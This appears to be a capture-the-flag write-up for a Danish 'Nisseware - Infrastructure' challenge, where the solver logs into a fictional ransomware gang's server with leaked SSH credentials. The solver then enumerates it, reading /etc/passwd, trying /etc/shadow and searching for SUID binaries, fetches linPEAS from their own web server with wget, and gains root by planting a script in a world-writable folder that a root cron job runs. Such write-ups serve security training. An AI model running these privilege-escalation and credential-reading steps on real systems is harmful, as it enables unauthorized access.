Challenge Name:
Nisseware - Infrastructure
Category:
Malware
Challenge Description:
Vi skal hjælpe alle sagens forurettede, men for virkelig at gøre en forskel, skal der tages fat om problemets rod: N1ss3b4nd3n selv.
Vi formoder de befinder sig på Nordpolen, og vi har ingen mulighed for retsforfølgelse her, så der må tages andre midler i brug: Disruption.
Find gruppens server, infiltrer den og se, om du kan få fuld root access, så alle ofre kan få deres data dekrypteret og slettet fra serveren og al infrastruktur kan tages ned.
Opgaven bygger videre på de fundne spor i Nisseware: OSINT - fandt du det hele? 👀
Note: Opgaven var tilgængelig via Haaukins under CTFen
Approach
Working from our OSINT investigation
This writeup continues on the findings of Nisseware - OSINT, in which there was a very important statement in the end of the description: “fandt du det hele? 👀” (did you find everyting?).
In the OSINT challenge we found the social media profiles of HrM0rt3ns3n & N1ss3f4r on Mastodon and infosec.exchange. N1ss3f4r however stated the following in his final post
Translated from Danish, it reads: “It is a slightly confusing platform for such an oldtimer like me, how do you get new followers? Perhaps I should stick to the good old networks, at least I know those.”
This hint is important, since it might indicate that he has additional profiles we didn’t uncover with the OSINT tool.
After some investigation a very significant limitation of the tool Sherlock was discovered, which is the fact that it does unfortunately not search well on some social media accounts, one of which is Instagram! Therefore it is definitely always a good idea to investigate the well-known SoMe sites, such as Facebook, YouTube, Instagram, Twitter, GitHub, TikTok etc.
Being an oldtimer myself… I do not have an account on Instagram and therefore I didn’t uncover this profile immediately!
A lot of great pictures have been posted on this Instagram profile
Out of all the images, especially this one stands out
If we zoom on the picture we can see, on the left side of the screen, the development in Visual Studio Code of the VBA script from Nisseware - Phishing. However more importantly on the right side we see an SSH login session in the upper right
and what appears to be an email from HrM0rt3ns3n, which contains some SSH credentials!
The text reads
Godmorgen nissefar!
Jeg har som aftalt sat ny C2-server op, den burde være good to go.
Du kan forbinde via SSH til n1ss3b4nd3n.jul med dit normale handle og passwordet:
HyphypAlleMine9R3nsdyr!
Har smidt et par scripts på til automatisk fetch af nye ransom betalinger og til at wipe logs regelmæssigt,
så du skal ikke være så nervøs for, hvordan du bruger maskinen.
Vi skal nødig ende i samme situation som sidst, spændende hvornår Sk1pp3r kommer ud igen...
/Hr. M0rt3ns3n
How incredibly lucky! We obtained the password “HyphypAlleMine9R3nsdyr!” for the server “n1ss3b4nd3n.jul”. On the SSH session image we can see n1ss3f4r connecting via SSH to this very server, so we should absolutely try the same!
Enumerating
As always we execute an nmap scan to locate the “n1ss3b4nd3n.jul” server.
┌──(haaukins㉿kali)-[~]
└─$ nmap --open 77.138.111.0/24
Nmap scan report for 77.138.111.41
Host is up (0.00068s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.31 seconds
We do locate the server and see a single port 22 (SSH) being open, which is definitely exhilarating, seeing as we have some SSH credentials readily available!
We try to SSH connect to the server with our credentials and low and behold!
┌──(haaukins㉿kali)-[~]
└─$ ssh n1ss3f4r@n1ss3b4nd3n.jul
The authenticity of host 'n1ss3b4nd3n.jul (77.138.111.41)' can't be established.
ED25519 key fingerprint is SHA256:VvS0qdYOC8cg07HhXtpEOXWYOCr/APJAbOpwuQNzEbU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'n1ss3b4nd3n.jul' (ED25519) to the list of known hosts.
n1ss3f4r@n1ss3b4nd3n.jul's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
n1ss3f4r@acaeda685ce2:~$
We have a shell as the user on the victim! Let’s immediately execute some initial enumeration and see what we can find
n1ss3f4r@acaeda685ce2:~$ whoami
n1ss3f4r
n1ss3f4r@acaeda685ce2:~$ pwd
/home/n1ss3f4r
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_user.txt loader.vbs payloads todo.txt
n1ss3f4r@acaeda685ce2:~$ cat flag_user.txt
NC3{N1ss3b4nd3ns_53rv3r
n1ss3f4r@acaeda685ce2:~$
We verify which user we are connected as, see that we landed in his /home directory and find a bunch of files in the folder! The VBA-script from Nisseware - Phishing, a payloads folder with content we already used to solve Nisseware - Loading and then half a flag… which is a little disappointing, but indicates that we are very close! There is also a todo.txt, which reads:
# TODO
- Følg op på seneste angreb (Legetøj"Я"Os)
- Monitorer overførsel af ransom
- Gennemgå eksfiltrerede dokumenter med prototyper, sæt i produktion eller sælg
- Forbedr script til monitorering af nye ransomoverførsler
- Husk tandlægetid
- Forbered nisserne på ny fyringsrunde
- Find nye targets i legetøjsbranchen
- Tjek op på serverens sikkerhed, bør muligvis hærdes lidt
This contains references back to previous challenges in the Nisseware series, but also a reference to a monitoring script and what appears to be a TODO to check up on the security of the server, which could potentially need to be improved!
This is an important clue, which hints us to check for vulnerabilities.
In general, when doing a “HackTheBox” challenge, in which we go through the stages of hacking, when we get access to “the box” it is a good idea to go though a “checklist” of user rights and especially check for super user rights on Linux machines!
n1ss3f4r@acaeda685ce2:~$ whoami && uname -a && sudo -l
n1ss3f4r
Linux acaeda685ce2 5.15.0-88-generic #98-Ubuntu SMP Mon Oct 2 15:18:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
Sorry, user n1ss3f4r may not run sudo on acaeda685ce2.
n1ss3f4r@acaeda685ce2:~$
Here we see the user, the OS architecture and that the user cannot run any command as super user (unfortunately)
n1ss3f4r@acaeda685ce2:~$ cat /etc/passwd && cat /etc/shadow
root:x:0:0:root:/root:/bin/bash
# -- SYSTEM USERS LEFT OUT FOR BETTER OVERVIEW -- #
n1ss3f4r:x:1000:1000::/home/n1ss3f4r:/bin/bash
cat: /etc/shadow: Permission denied
n1ss3f4r@acaeda685ce2:~$
Here we see all the users on the system, but besides root, which is the administrative user on Linux systems, we only have a single other real user, which is n1ss3f4r. We are not allowed to watch the /etc/shadow file, which on newer Linux OS is the file that actually holds the hashed user passwords, which we could have tried to crack, had we been able to read them.
n1ss3f4r@acaeda685ce2:~$ find / -type f -perm -04000 -ls 2>/dev/null
5954417 48 -rwsr-xr-x 1 root root 47480 Feb 21 2022 /usr/bin/mount
5954523 36 -rwsr-xr-x 1 root root 35192 Feb 21 2022 /usr/bin/umount
5954422 40 -rwsr-xr-x 1 root root 40496 Nov 24 2022 /usr/bin/newgrp
5954433 60 -rwsr-xr-x 1 root root 59976 Nov 24 2022 /usr/bin/passwd
5954297 44 -rwsr-xr-x 1 root root 44808 Nov 24 2022 /usr/bin/chsh
5954497 56 -rwsr-xr-x 1 root root 55672 Feb 21 2022 /usr/bin/su
5954291 72 -rwsr-xr-x 1 root root 72712 Nov 24 2022 /usr/bin/chfn
5954359 72 -rwsr-xr-x 1 root root 72072 Nov 24 2022 /usr/bin/gpasswd
6454237 228 -rwsr-xr-x 1 root root 232416 Apr 3 2023 /usr/bin/sudo
6454317 332 -rwsr-xr-x 1 root root 338536 Aug 24 13:40 /usr/lib/openssh/ssh-keysign
6454287 36 -rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
n1ss3f4r@acaeda685ce2:~$
The intention of this command is to look for SUID bits, which can be used in certain situations to escalate privileges (PrivEsc). One great site for finding such tricks is GTFOBINS. Unfortunately this is also not a possible path forward, seeing as only the root user has these bits set.
We therefore upload an enumeration script from our attacking machine to the victim by opening a webserver from our Kali machine
┌──(haaukins㉿kali)-[~]
└─$ python3 -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
and on the victim we make a wget request to download linPeas
n1ss3f4r@acaeda685ce2:~$ wget http://77.138.111.4:1337/linpeas.sh
--2023-12-20 21:25:25-- http://77.138.111.4:1337/linpeas.sh
Connecting to 77.138.111.4:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835306 (816K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=================================================>] 815.73K --.-KB/s in 0.007s
2023-12-20 21:25:25 (109 MB/s) - ‘linpeas.sh’ saved [835306/835306]
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_user.txt linpeas.sh loader.vbs payloads todo.txt
n1ss3f4r@acaeda685ce2:~$ chmod +x linpeas.sh
n1ss3f4r@acaeda685ce2:~$
After downloading the enumeration script and making it executable, we run it and read through the report, in which we see that there is a cronjob setup, which is being run as root! This can be confirmed by running the “top” command in Linux
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 2888 956 864 S 0.0 0.0 0:00.04 sh
7 root 20 0 4360 3280 3040 S 0.0 0.0 0:00.00 startup.sh
9 root 20 0 3884 2044 1812 S 0.0 0.0 0:00.00 cron
11 root 20 0 15420 9068 7496 S 0.0 0.0 0:00.01 sshd
25 root 20 0 16712 10568 8676 S 0.0 0.0 0:00.08 sshd
36 n1ss3f4r 20 0 16972 8276 6108 S 0.0 0.0 0:00.07 sshd
37 n1ss3f4r 20 0 5044 4100 3476 S 0.0 0.0 0:00.02 bash
9813 n1ss3f4r 20 0 7736 3588 3024 R 0.0 0.0 0:00.00 top
With interest in which tasks the cronjob might be handling we go take a look at
n1ss3f4r@acaeda685ce2:~$ ls /etc/cron.d
e2scrub_all run_scripts
n1ss3f4r@acaeda685ce2:~$ cat /etc/cron.d/run_scripts
*/5 * * * * root /bin/bash /root/run_all.sh /usr/scheduled
n1ss3f4r@acaeda685ce2:~$
There are two jobs available. “e2scrub”, which is a default error checking job for storage, which is not of huge interest compared to “run_scripts”, which appears to be a custom job! The job executes a “/root/run_all.sh” script every 5 minutes as root on the folder “/usr/scheduled”. Seeing as we can’t inspect the run_all script as it is located in the root directory, we can instead check out the /usr/scheduled folder.
n1ss3f4r@acaeda685ce2:~$ ls -alh /usr/scheduled/
total 16K
drwxrwxrwx 1 root root 4.0K Nov 29 11:20 .
drwxr-xr-x 1 root root 4.0K Nov 29 11:20 ..
-rwx------ 1 root root 110 Nov 29 11:19 delete_logs.sh
-rwx------ 1 root root 594 Nov 29 11:19 fetch_new_payments.sh
n1ss3f4r@acaeda685ce2:~$ cat /usr/scheduled/delete_logs.sh
cat: /usr/scheduled/delete_logs.sh: Permission denied
n1ss3f4r@acaeda685ce2:~$ cat /usr/scheduled/fetch_new_payments.sh
cat: /usr/scheduled/fetch_new_payments.sh: Permission denied
n1ss3f4r@acaeda685ce2:~$
We find two scripts in this folder. “delete_logs.sh” & “fetch_new_payments.sh”. Both scripts can only be read as the root user, so we can only guess to their intentions, but with the knowledge of the cronjob running on the entire folder, we might be able to add our own script to be executed as a root user!
From here we could do a plethora of things. In a CTF context the simplest would be to simply read out the flag, which we might guess to be located at /root/flag_root.txt (considering the naming convention of the user flag!).
A better way of securing permanent PrivEsc would be to create a reverse shell attack, which would spawn a shell on our attacking machine as the root user on the victim.
Seeing as this is CTF and time matters for points, we simply create a script to copy the root flag to a directory we can read from!
#!/bin/bash
cp /root/flag_root.txt /home/n1ss3f4r/
n1ss3f4r@acaeda685ce2:~$ vim /usr/scheduled/pwn.sh
n1ss3f4r@acaeda685ce2:~$ chmod +x /usr/scheduled/pwn.sh
# -- WAITING FOR 5 agonizing minutes --- #
n1ss3f4r@acaeda685ce2:~$ ls
2023-Q3-regnskab.xlsm flag_root.txt flag_user.txt linpeas.sh loader.vbs payloads todo.txt
We use the best text editor known to man and create our new script to copy the flag_root.txt to our home directory! After this there is nothing to do, but wait 5 minutes for the cronjob to execute and see if we managed to solve the challenge…
And after 5 minutes we see that a new file has been created in out home directory, which allows us to read the second half of the flag!
n1ss3f4r@acaeda685ce2:~$ cat flag_user.txt flag_root.txt
NC3{N1ss3b4nd3ns_53rv3r
_1nf1ltr3r3t_g00d_j0b!}
n1ss3f4r@acaeda685ce2:~$ echo "$(cat flag_user.txt)$(cat flag_root.txt)"
NC3{N1ss3b4nd3ns_53rv3r_1nf1ltr3r3t_g00d_j0b!}
n1ss3f4r@acaeda685ce2:~$
Flag
NC3{N1ss3b4nd3ns_53rv3r_1nf1ltr3r3t_g00d_j0b!}
Reflections and Learnings
The Power of OSINT and Attention to Detail
This challenge was a powerful reminder of the critical role of Open Source Intelligence (OSINT) in cybersecurity. The initial clue from N1ss3f4r’s Instagram account was pivotal. It underscores the importance of thorough investigation and considering even seemingly minor details - what might initially appear as an innocuous social media post can, in fact, be a treasure trove of information.
The Necessity of Understanding and Leveraging System Configurations
Thorough enumeration of the current step in the challenge is essential to move on! The discovery of the cron job running as root highlighted the importance of understanding system configurations and how they can be manipulated for privilege escalation. The ability to recognize and exploit such configurations is a vital skill in cybersecurity.